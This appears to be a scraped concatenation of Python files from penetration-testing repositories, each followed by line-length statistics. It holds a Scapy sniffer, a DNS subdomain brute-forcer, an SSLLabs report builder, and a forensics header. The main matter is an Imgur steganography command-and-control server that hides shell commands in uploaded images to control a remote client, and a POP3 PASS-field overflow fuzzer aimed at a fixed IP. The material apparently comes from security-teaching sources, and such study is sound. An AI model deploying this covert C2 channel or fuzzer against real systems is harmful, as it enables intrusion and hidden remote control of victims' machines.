if pkt.haslayer(Dot11Beacon):
print '[+] Detected 802.11 Beacon Frame'
elif pkt.haslayer(Dot11ProbeReq):
print '[+] Detected 802.11 Probe Request Frame'
elif pkt.haslayer(TCP):
print '[+] Detected a TCP Packet'
elif pkt.haslayer(DNS):
print '[+] Detected a DNS Packet'
conf.iface = 'mon0'
sniff(prn=pktPrint)
| 21.4 | 55 | 0.628635 |
Python-Penetration-Testing-for-Developers | from imgurpython import ImgurClient
import StegoText, random, time, ast, base64
def get_input(string):
''' Get input from console regardless of python 2 or 3 '''
try:
return raw_input(string)
except:
return input(string)
def create_command_message(uid, command):
command = str(base64.b32encode(command.replace('\n','')))
return "{'uuid':'" + uid + "','command':'" + command + "'}"
def send_command_message(uid, client_os, image_url):
command = get_input(client_os + "@" + uid + ">")
steg_path = StegoText.hide_message(image_url,
create_command_message(uid, command),
"Imgur1.png",
True)
print "Sending command to client ..."
uploaded = client.upload_from_path(steg_path)
client.album_add_images(a[0].id, uploaded['id'])
if command == "quit":
sys.exit()
return uploaded['datetime']
def authenticate():
client_id = '<YOUR CLIENT ID>'
client_secret = '<YOUR CLIENT SECRET>'
client = ImgurClient(client_id, client_secret)
authorization_url = client.get_auth_url('pin')
print("Go to the following URL: {0}".format(authorization_url))
pin = get_input("Enter pin code: ")
credentials = client.authorize(pin, 'pin')
client.set_user_auth(credentials['access_token'], credentials['refresh_token'])
return client
client = authenticate()
a = client.get_account_albums("<YOUR IMGUR USERNAME>")
imgs = client.get_album_images(a[0].id)
last_message_datetime = imgs[-1].datetime
print "Awaiting client connection ..."
connected_uuid = ""
loop = True
while loop:
time.sleep(5)
imgs = client.get_album_images(a[0].id)
if imgs[-1].datetime > last_message_datetime:
last_message_datetime = imgs[0].datetime
client_dict = ast.literal_eval(StegoText.extract_message(imgs[-1].link, True))
if client_dict['status'] == "ready":
print "Client connected:\n"
print "Client UUID:" + client_dict['uuid']
print "Client OS:" + client_dict['os']
else:
print base64.b32decode(client_dict['response'])
random.choice(client.default_memes()).link
last_message_datetime = send_command_message(client_dict['uuid'],
client_dict['os'],
random.choice(client.default_memes()).link)
| 33.041096 | 96 | 0.594605 |
cybersecurity-penetration-testing | import csv_writer
import xlsx_writer
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20151012'
__version__ = 0.04
__description__ = 'This scripts parses the UserAssist Key from NTUSER.DAT.' | 27.571429 | 75 | 0.703518 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-19
# @File : domain_brute.py
# @Desc : ""
import dns.resolver
from multiprocessing import Pool, Lock
from datetime import datetime
from random import sample
from string import digits, ascii_lowercase
from fuxi.views.lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.lib.get_title import get_title
from instance import config_name
lock = Lock()
domain_db = db_name_conf()['domain_db']
config_db = db_name_conf()['config_db']
subdomain_db = db_name_conf()['subdomain_db']
def resolution(domain):
_result = {}
record_a = []
record_cname = []
try:
respond = dns.resolver.query(domain.strip())
for record in respond.response.answer:
for i in record.items:
if i.rdtype == dns.rdatatype.from_text('A'):
record_a.append(str(i))
_result[domain] = record_a
elif i.rdtype == dns.rdatatype.from_text('CNAME'):
record_cname.append(str(i))
_result[domain] = record_cname
except Exception as e:
# print(e)
pass
return _result
class DomainBrute:
def __init__(self, domain, domain_id):
self.domain = domain
self.domain_id = domain_id
self.sub_domain = []
self.third_domain = connectiondb(domain_db).find_one({"_id": domain_id})['third_domain']
self.resolver_ip = ''
self.result = ''
self.thread = int(connectiondb(config_db).find_one({"config_name": config_name})['subdomain_thread'])
self.subdomain_dict_2 = connectiondb(config_db).find_one({"config_name": config_name})['subdomain_dict_2']
self.subdomain_dict_3 = connectiondb(config_db).find_one({"config_name": config_name})['subdomain_dict_3']
self.random_subdomain = ''.join(sample(digits + ascii_lowercase, 10)) + '.' + domain
def domain_handle(self):
for sub_domain_2 in self.subdomain_dict_2:
self.sub_domain.append(sub_domain_2.strip() + '.' + self.domain)
if self.third_domain == "Enable":
for sub_domain_3 in self.subdomain_dict_3:
for sub_domain_2 in self.subdomain_dict_2:
sub_domain = sub_domain_3 + "." + sub_domain_2
self.sub_domain.append(sub_domain.strip() + '.' + self.domain)
return self.sub_domain
def resolver_check(self):
try:
var = resolution(self.random_subdomain)
if var[self.random_subdomain]:
return var[self.random_subdomain]
else:
return False
except Exception as e:
# print(e)
return False
def multi_brute(self):
start_date = datetime.now()
self.resolver_ip = self.resolver_check()
pool = Pool(processes=self.thread)
result = []
for sub_domain in self.domain_handle():
result.append(pool.apply_async(resolution, (sub_domain,)))
pool.close()
pool.join()
for res in result:
self.result = res.get()
for subdomain in self.result:
if self.result[subdomain] != self.resolver_ip:
data = {
"subdomain": subdomain,
"domain": self.domain,
"domain_id": self.domain_id,
"date": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"result": self.result[subdomain],
"title": '',
}
lock.acquire()
try:
connectiondb(subdomain_db).insert_one(data)
# print(self.result, var)
except Exception as e:
print("save_db error", e)
lock.release()
scan_time = datetime.now() - start_date
print("++++++++++ Scan Done! ++++++++++", scan_time.total_seconds())
def start_domain_brute(domain, domain_id):
connectiondb(domain_db).update_one({"_id": domain_id}, {"$set": {
"status": "Running"
}})
for i in domain:
start_brute = DomainBrute(i, domain_id)
start_brute.multi_brute()
connectiondb(domain_db).update_one({"_id": domain_id}, {"$set": {
"status": "Done"
}})
get_domain_title(domain_id)
def get_domain_title(domain_id):
pool = Pool(processes=50)
result = []
for i in connectiondb(subdomain_db).find({"domain_id": domain_id}):
result.append(pool.apply_async(get_title, (i['subdomain'], i['_id'])))
pool.close()
pool.join()
for res in result:
lock.acquire()
try:
connectiondb(subdomain_db).update_one({"_id": res.get()["_id"]}, {"$set": {
"title": res.get()['title']
}})
except Exception as e:
print("update title error", e)
lock.release()
| 34.864286 | 114 | 0.543625 |
owtf | #!/usr/bin/env python
from __future__ import print_function
import json
import os
import sys
import traceback
from template import RESULTS
from owtf.utils.file import FileOperations
if not os.path.isfile(sys.argv[1]):
sys.exit(1)
data = None
try:
data = FileOperations.open(json.loads(str(sys.argv[1])))
except Exception:
sys.exit(1)
if data is None:
sys.exit(1)
org_name = str(sys.argv[1]).split(".json", 1)[0]
try:
if data[0]["status"] == "ERROR":
print("[-] SSLLabs scan finished with errors")
sys.exit(0)
except IndexError:
print("Wrong format detected, exiting...")
sys.exit(0)
print("RESULT IN SSL_TLS_TESTING_FUNCTIONALITY_FROM_SSLLABS_REPORT.html")
try:
with open(org_name + "_report.html", "w") as f:
content = RESULTS
content = content.replace("{{host}}", data[0]["host"])
content = content.replace("{{status_code}}", str(data[0]["endpoints"][0]["details"]["httpStatusCode"]))
content = content.replace("{{ip_address}}", data[0]["endpoints"][0]["ipAddress"])
content = content.replace("{{grade}}", data[0]["endpoints"][0]["grade"])
content = content.replace("{{secondary_grade}}", data[0]["endpoints"][0]["gradeTrustIgnored"])
content = content.replace("{{freak}}", str(data[0]["endpoints"][0]["details"]["freak"]))
content = content.replace("{{poodle}}", str(data[0]["endpoints"][0]["details"]["poodleTls"]))
insecureRenegotiationSuported = "true" if data[0]["endpoints"][0]["details"]["renegSupport"] == 1 else "false"
content = content.replace("{{insecure_reneg}}", insecureRenegotiationSuported)
content = content.replace("{{openssl_ccs}}", str(data[0]["endpoints"][0]["details"]["openSslCcs"]))
if "dhUsesKnownPrimes" in data[0]["endpoints"][0]["details"]:
insecureDH = "true" if data[0]["endpoints"][0]["details"]["dhUsesKnownPrimes"] == 2 else "false"
content = content.replace("{{insecure_dh}}", insecureDH)
protocol_str = ""
for protocol in data[0]["endpoints"][0]["details"]["protocols"]:
protocol_str += "<h2> Protocol SSL/TLS version supported : </h2>" + protocol["name"] + " " + protocol[
"version"
]
content = content.replace("{{protocol}}", protocol_str)
certificate_exp = "true" if data[0]["endpoints"][0]["details"]["chain"]["issues"] == 2 else "false"
content = content.replace("{{cert_exp}}", certificate_exp)
selfSigned = "true" if data[0]["endpoints"][0]["details"]["cert"]["issues"] == 64 else "false"
content = content.replace("{{self_signed}}", selfSigned)
content = content.replace("{{rc4}}", str(data[0]["endpoints"][0]["details"]["supportsRc4"]))
content = content.replace("{{fwd_sec}}", str(data[0]["endpoints"][0]["details"]["forwardSecrecy"]))
secureRenegotiationSuported = "true" if data[0]["endpoints"][0]["details"]["renegSupport"] == 2 else "false"
content = content.replace("{{sec_reneg}}", secureRenegotiationSuported)
cert_chains = ""
for chainCert in data[0]["endpoints"][0]["details"]["chain"]["certs"]:
cert_chains += "<h2> Chain Cert issue: </h2>" + str(
chainCert["issues"]
) + "(1:certificate not yet valid,2:certificate expired,4:weak key,8:weak signature,16:blacklisted)"
weakKey = "true" if chainCert["issues"] == 4 else "false"
weakSignature = "true" if chainCert["issues"] == 8 else "false"
cert_chains += "<h2> Weak private key: </h2>" + weakKey
cert_chains += "<h2> Weak certificate: </h2>" + weakSignature
content = content.replace("{{cert_chains}}", cert_chains)
f.write(content)
print("Done. Report write successful.")
except:
print("Something went wrong when parsing result")
print(traceback.format_exc())
sys.exit(0)
sys.exit(0)
| 40.568421 | 118 | 0.611196 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
while len(buffer)<=30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print"Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.137',110))
data=s.recv(1024)
#print str(data)
s.send('USER root\r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + string + '\r\n')
s.send('QUIT\r\n')
s.close()
| 17.964286 | 54 | 0.596226 |